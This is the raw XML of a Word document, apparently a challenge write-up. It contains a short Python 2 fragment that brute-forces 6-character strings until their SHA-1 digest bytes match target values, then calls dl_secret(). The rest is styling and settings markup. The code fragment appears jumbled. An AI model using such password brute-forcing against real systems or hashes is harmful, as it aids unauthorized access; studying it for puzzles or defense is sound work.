    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>pw = "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>for g in xrange(0x21, 0xFF):</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t>for f in xrange(0x21, 0x7A):</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for e in xrange(0x30, 0x7A):</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for d in xrange(0x30, 0x7A):</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for c in xrange(0x21, 0xFF):</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print pw;</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for b in xrange(0x21, 0xFF):</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for a in xrange(0x21, 0xFF):</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h = hashlib.sha1();</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pw = chr(a) + chr(b) + chr(d) + chr(e) + chr(f) + chr(g)</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h.update(pw);</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digest = h.digest();</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p = unpack("BBBB", digest[0:4]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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if p[3] != 0xA3 or p[1] != 0x00:</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continue;</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if p[2] != 0x6E and p[2] != 0x4E:</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continue;</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print "[",;</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for x in pw:</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print "%02X" % unpack("B", x),;</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print "]";</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print "%s" % pw;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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r>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:tab/>
        <w:t>exit();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRPr="00C03E31" w:rsidRDefault="00921462" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>dl_secret();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidSect="002A0286">
      <w:footerReference w:type="default" r:id="rId10"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1985" w:right="1701" w:bottom="170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F76" w:rsidRDefault="00791F76" w:rsidP="00C410E1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00791F76" w:rsidRDefault="00791F76" w:rsidP="00C410E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DotumChe">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9A5" w:rsidRDefault="00AA5FD6">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
      <w:r w:rsidR="004A5FAD" w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ja-JP"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
    </w:fldSimple>
  </w:p>
  <w:p w:rsidR="00AF29A5" w:rsidRDefault="00AF29A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F76" w:rsidRDefault="00791F76" w:rsidP="00C410E1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00791F76" w:rsidRDefault="00791F76" w:rsidP="00C410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500D26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D8214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720"/>
  <w:noPunctuationKerning/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:hdrShapeDefaults>
    <o:shapedefaults v:ext="edit" spidmax="7170">
      <v:textbox inset="5.85pt,.7pt,5.85pt,.7pt"/>
    </o:shapedefaults>
  </w:hdrShapeDefaults>
  <w:footnotePr>
    <w:footnote w:id="-1"/>
    <w:footnote w:id="0"/>
  </w:footnotePr>
  <w:endnotePr>
    <w:endnote w:id="-1"/>
    <w:endnote w:id="0"/>
  </w:endnotePr>
  <w:compat>
    <w:useFELayout/>
  </w:compat>
  <w:rsids>
    <w:rsidRoot w:val="00C410E1"/>
    <w:rsid w:val="00006EE0"/>
    <w:rsid w:val="000131C6"/>
    <w:rsid w:val="001A2F88"/>
    <w:rsid w:val="001A317E"/>
    <w:rsid w:val="002209F4"/>
    <w:rsid w:val="0025221C"/>
    <w:rsid w:val="00280EE9"/>
    <w:rsid w:val="002A0286"/>
    <w:rsid w:val="002A0D27"/>
    <w:rsid w:val="002B672C"/>
    <w:rsid w:val="004A5FAD"/>
    <w:rsid w:val="004C534A"/>
    <w:rsid w:val="00591E9D"/>
    <w:rsid w:val="005E795A"/>
    <w:rsid w:val="00680149"/>
    <w:rsid w:val="006A2FB1"/>
    <w:rsid w:val="00702C97"/>
    <w:rsid w:val="007406A1"/>
    <w:rsid w:val="00762DA2"/>
    <w:rsid w:val="00791F76"/>
    <w:rsid w:val="007A3968"/>
    <w:rsid w:val="0086609F"/>
    <w:rsid w:val="008A4C86"/>
    <w:rsid w:val="008C79FD"/>
    <w:rsid w:val="00921462"/>
    <w:rsid w:val="009934CF"/>
    <w:rsid w:val="009953C5"/>
    <w:rsid w:val="009B3B94"/>
    <w:rsid w:val="009C4823"/>
    <w:rsid w:val="00A01E94"/>
    <w:rsid w:val="00A63E67"/>
    <w:rsid w:val="00A93468"/>
    <w:rsid w:val="00AA5FD6"/>
    <w:rsid w:val="00AF29A5"/>
    <w:rsid w:val="00B23D12"/>
    <w:rsid w:val="00B77BE6"/>
    <w:rsid w:val="00BE74E0"/>
    <w:rsid w:val="00C00B86"/>
    <w:rsid w:val="00C03E31"/>
    <w:rsid w:val="00C410E1"/>
    <w:rsid w:val="00CA3797"/>
    <w:rsid w:val="00CC038C"/>
    <w:rsid w:val="00CC1B76"/>
    <w:rsid w:val="00CC1E2C"/>
    <w:rsid w:val="00D56926"/>
    <w:rsid w:val="00E71451"/>
    <w:rsid w:val="00EB4B4B"/>
    <w:rsid w:val="00FF3A3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ja-JP" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault/>
  </w:docDefaults>
  <w:latentStyles w:defLockedState="0" w:defUIPriority="99"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Title" w:semiHidden="0" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Strong" w:semiHidden="0" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Quote" w:semiHidden="0" w:unhideWhenUsed="0" w:qFormat="1"/>
    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:unhideWhenUsed="0" w:qFormat="1"/>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uiPriority="39" w:qFormat="1"/>
  </w:latentStyles>
  <w:style w:type="paragraph" w:default="1" w:styleId="a">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00805BCE"/>
    <w:pPr>
      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B96"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="90" w:after="90"/>
      <w:ind w:left="90" w:right="90"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="32"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B96"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="90" w:after="90"/>
      <w:ind w:left="90" w:right="90"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B96"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="90" w:after="90"/>
      <w:ind w:left="90" w:right="90"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B96"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="90" w:after="90"/>
      <w:ind w:left="90" w:right="90"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B96"/>
    <w:pPr>
      <w:spacing w:before="90" w:after="90"/>
      <w:ind w:left="90" w:right="90"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B96"/>
    <w:pPr>
      <w:spacing w:before="90" w:after="90"/>
      <w:ind w:left="90" w:right="90"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="16"/>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ritely-toc-lower-roman">
    <w:name w:val="writely-toc-lower-roman"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Tr">
    <w:name w:val="Tr"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Img">
    <w:name w:val="Img"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Div">
    <w:name w:val="Div"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="webkit-indent-blockquote">
    <w:name w:val="webkit-indent-blockquote"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="writely-toc-disc">
    <w:name w:val="writely-toc-disc"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Ol">
    <w:name w:val="Ol"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="writely-toc-decimal">
    <w:name w:val="writely-toc-decimal"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Option">
    <w:name w:val="Option"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Ul">
    <w:name w:val="Ul"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Select">
    <w:name w:val="Select"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="writely-toc-lower-alpha">
    <w:name w:val="writely-toc-lower-alpha"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Blockquote">
    <w:name w:val="Blockquote"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="dashSmallGap" w:sz="6" w:space="7" w:color="DDDDDD"/>
        <w:left w:val="dashSmallGap" w:sz="6" w:space="7" w:color="DDDDDD"/>
        <w:bottom w:val="dashSmallGap" w:sz="6" w:space="7" w:color="DDDDDD"/>
        <w:right w:val="dashSmallGap" w:sz="6" w:space="7" w:color="DDDDDD"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:bdr w:val="dashSmallGap" w:sz="6" w:space="0" w:color="DDDDDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="writely-toc-upper-alpha">
    <w:name w:val="writely-toc-upper-alpha"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Table">
    <w:name w:val="Table"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Li">
    <w:name w:val="Li"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="pb">
    <w:name w:val="pb"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Address">
    <w:name w:val="Address"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Pre">
    <w:name w:val="Pre"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Olwritely-toc-subheading">
    <w:name w:val="Ol_writely-toc-subheading"/>
    <w:basedOn w:val="Ol"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="writely-toc-upper-roman">
    <w:name w:val="writely-toc-upper-roman"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="writely-toc-none">
    <w:name w:val="writely-toc-none"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002A0286"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C410E1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="머리글 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00C410E1"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C410E1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="바닥글 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C410E1"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C410E1"/>
    <w:pP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S Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic"/>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLChar">
    <w:name w:val="미리 서식이 지정된 HTML Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C410E1"/>
    <w:rPr>
      <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00C410E1"/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="840"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="challenge">
    <w:name w:val="challenge"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="challenge0"/>
    <w:qFormat/>
    <w:rsid w:val="00280EE9"/>
    <w:rPr>
      <w:sz w:val="27"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="shorttext">
    <w:name w:val="short_text"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D56926"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="challenge0">
    <w:name w:val="challenge (文字)"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="challenge"/>
    <w:rsid w:val="00280EE9"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:color w:val="000000"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009934CF"/>
    <w:pPr>
      <w:keepLines/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:spacing w:before="480" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="MS Gothic" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:color w:val="365F91"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009934CF"/>
    <w:pPr>
      <w:ind w:leftChars="700" w:left="1400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009934CF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009934CF"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="30">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009934CF"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009934CF"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="MS Gothic" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="풍선 도움말 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="009934CF"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="MS Gothic" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009934CF"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=word/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:divs>
    <w:div w:id="458837606">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1454135716">
